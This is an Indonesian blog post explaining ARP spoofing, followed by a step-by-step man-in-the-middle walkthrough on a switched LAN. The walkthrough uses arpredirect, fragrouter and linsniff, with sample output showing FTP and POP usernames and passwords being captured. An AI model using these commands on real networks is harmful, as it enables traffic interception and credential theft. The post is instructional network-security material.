teori singkat ARP spoofing

author : tugrix

Ketemu lagi ma rejal pengamen yg manis ini semoga tidak bosen huehhehe ok lah klo be..be..begito.....hayah guyon ae .....kembali ke diskusi,Tulisan ini saya buat ketika saya ma dani waktu login ke mikrotik routerboard sebuah warnet dan ternyata terserang ARP Spoofing dan dengan hebatnya dpt mematikan squid proxy dari router mikocok :D dengan mengkloning ip address lewat mac adress tapiAlhamdulilah ternyata dpt diatasi

saya mencoba menjelaskan singkat ttg aa itu ARP Spoofing (bagi" ilmu = bagi" rejeki dan amal )

sebagai contoh:

Sebuah komputer yang terhubung ke sebuah IP / Ethernet LAN memiliki dua alamat. Salah satunya adalah alamat dari kartu jaringan, yang disebut alamat MAC. MAC, secara teori, adalah global yang unik dan tidak dapat diubah alamat yang tersimpan pada kartu jaringan itu sendiri. Alamat MAC yang diperlukan sehingga protokol Ethernet dapat mengirim data bolak-balik, Independen aplikasi apa pun protokol yang digunakan di atasnya. Ethernet membangun "frame" data, yang terdiri Dari 1500 byte blok. Setiap frame memiliki header Ethernet, yang berisi alamat MAC sumber dan komputer tujuan.

Alamat kedua adalah alamat IP. IP merupakan sebuah protokol yang digunakan oleh aplikasi, independen dari teknologi jaringan apa pun yang beroperasi di bawahnya. Setiap komputer di dalam sebuah jaringan harus memiliki alamat IP khusus untuk Berkomunikasi.
IP dan Ethernet harus bekerja sama. IP berkomunikasi dengan membangun "paket" yang mirip dengan frame, tapi memiliki struktur yang berbeda. Paket-paket ini tidak dapat dikirim tanpa lapisan jaringan. Dalam kasus kami mereka disampaikan oleh Ethernet, yang membagi paket menjadi frame, menambahkan header Ethernet untuk pengiriman, dan mengirimkan mereka ke kabel ke switch. Saklar yang kemudian memutuskan port untuk mengirim frame untuk, dengan membandingkan alamat tujuan dari frame ke meja internal yang memetakan nomor port ke alamat MAC. Ketika sebuah frame Ethernet dibangun, harus dibangun dari paket IP. Namun, pada saat konstruksi, Ethernet tidak tahu apa alamat MAC dari mesin tujuan yang diperlukan untuk membuat header Ethernet. Satu-satunya informasi yang telah tersedia adalah tujuan IP dari header paket. Pasti ada jalan bagi protokol Ethernet untuk menemukan alamat MAC komputer tujuan, diberi IP tujuan. Ini adalah tempat ARP, para Address Resolution Protocol, masuk ARP spoofing

Untuk contoh, kita akan menghubungkan 3 sistem ke jaringan switch.
Sistem "HDB" adalah default gateway. IP dari default gateway 10.0.2.121.
Sistem "HD" adalah Originating host, IP dari "HD" adalah 10.0.2.211.
"TUGRIK" adalah serangan tuan rumah, IP dari "TUGRIK" adalah 10.0.2.233,
"TUGRIK" akan bertindak sebagai kita penyerang di Tengah".
Untuk meluncurkan Attack kita perlu menjalankan ARP Redirect,
Bagian dari paket yang tersedia dari dsniff di http://www.XYZ.org/ ~ ABC / dsniff),
Paket akan membiarkan kita mencegat paket dari target host di jaringan yang ditujukan untuk host yang lain,

Biasanya default gateway. Ingat kita terhubung ke sebuah switch; Kita hanya dapat melihat
jaringan lalu lintas. Namun Redirect Menggunakan ARP akan memungkinkan kita bagaimana untuk melihat semua
lalu lintas antara HD dan HDB. Di "TUGRIK" menjalankan Perintah berikut:

INI CONTOH MENGGUNAKAN LINUX (mav yg suka win(cuk)dos) hueeeeeeheeee.....

[root@TUGRIK @ ~] ping HDB
PING 10.0.2.121 from 10.0.2.233 : 56(84) bytes of data.
64 bytes from 10.0.2.121L icmp_seq=0 ttl=128 time=1.3 ms
[root@TUGRIK @ ~] ping HD
PING 10.0.2.211 from 10.0.2.233 : 56(84) bytes of data
64 bytes from 10.0.2.211: icmp_seq=0 ttl=255 time=5.2 ms

Ini akan memungkinkan TUGRIK untuk men cache alamat hardware target, ini akan diperlukan ketika menjalankan redirect

[root@TUGRIK @ ~] arpredirect -t 10.0.2.211 10.0.2.121
intercepting traffic from 10.0.2.211 to 10.0.2.121 (^c to exit)… (kontrol c untuk keluar console)
Ini akan menjalankan ARP Redirect kita dan akan mengarahkan ulang seluruh lalu lintas untuk gateway (HDB)
ke penyerang (TUGRIK).
Hal ini dilakukan dengan mengarahkan dengan mengganti arp gateway default HD untuk TUGRIK,
sehingga mengatakan target untuk mengirim semua lalu lintas ke TUGRIK pertama,
ada gilirannya akan mengirimkan TUGRIK lalu lintas (Setelah mengendus melalui) ke sasaran yang dimaksud.
Akibatnya TUGRIK adalah berubah menjadi router dan akan mengarahkan ulang lalu lintas dari HD ke HDB
jadi kita harus membuatnya bertindak seperti router dan mengaktifkan IP forwarding di TUGRIK sehingga
dapat mengarahkan lalu lintas ke HDB setelah telah ditangkap oleh TUGRIK.
Alih-alih menggunakan tingkat Kernel IP forwarding kita gunakan sebagai fragrouter level kernel
mungkin akan mengirimkan ICMP redirect dan dapat mengganggu proses.
fragrouter akan memungkinkan kita untuk dengan mudah mengaktifkan IP forwarding sederhana
dari baris perintah dengan menggunakan Switch-B1 seperti di bawah ini

[root@TUGRIK ~] fragrouter -B1
10.0.2.211.2079 > 192.168.20.20.21: S 592459704:592459704(0)
10.0.2.211.2079 > 192.168.20.20.21 : P 592459705:592459717(12)
10.0.2.211.2079 > 192.168.20.20.21 : . ack 235437339
10.0.2.211.2079 > 192.168.20.20.21 : P 592459717:592459730(13)
(output trimmed)

Akhirnya kita perlu mengaktifkan paket analyzer di TUGRIK untuk menangkap lalu lintas dengan sniffing yang seperti terlihat ini.

[root@TUGRIK ~] linsniff
Linux Sniffer Beta v.99
Log opened.
———[SYN] (slot 1)
10.0.2.121 => 192.168.20.20 [21]
USER UltimA
PASS lol.you.got.owned
PORT 10,1,1,18,8,35
NLST
QUIT
———[SYN] (slot 1)
10.0.2.121 => 192.168.20.20 [110]
USER UltimA@HD.com PASS TUGRIK.pwned.Me
[FIN] (1)

Mari kita memeriksa apa yang terjadi. Setelah ARPRedirect ini diaktifkan, TUGRIK mulai mengirim
ARP palsu kepada HD mengaku sebagai HDB. HD (Menjadi Terbelakang)
dengan baru ARP Tabel diperbarui untuk mencerminkan alamat HDB Hardware baru atau Hardware address.
Kemudian pengguna HD menuju jalur FTP dan POP ke 192.168.20.20 lalu USER dan PASS di coba login oleh sniffer.
Dalam contoh terakhir kami hanya mengarahkan lalu lintas dari HD ke HDB; Namun,
jika kita kehilangan-t switch di perintah arpredirect (me-redirect ARP) kita bisa redrect SEMUA lalu lintas pada jaringan.

itu adalah ulasan singkat mengenai apa itu ARP Spoofing dan teknik sederhananya :)
AKU YAKIN SING BIASA NGESET JARINGAN NETWORK TERUTAMA LINUX,BSD DAN MIKOCOK NGERTI CARANE ANTISIPASI NGEBLOK ARP SPOOFING............:)
VIVA OPEN SOURCE...............FUCK THE WINDOWS :D

semoga ini bisa bermanfaat buat semua khususnya (ank" NETWORK DUMBER CREW TUBAN)

Walaikum slm Wr Wb

referensi:
http://en.wikipedia.org/wiki/ARP_spoofing

 
You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response.
0 Responses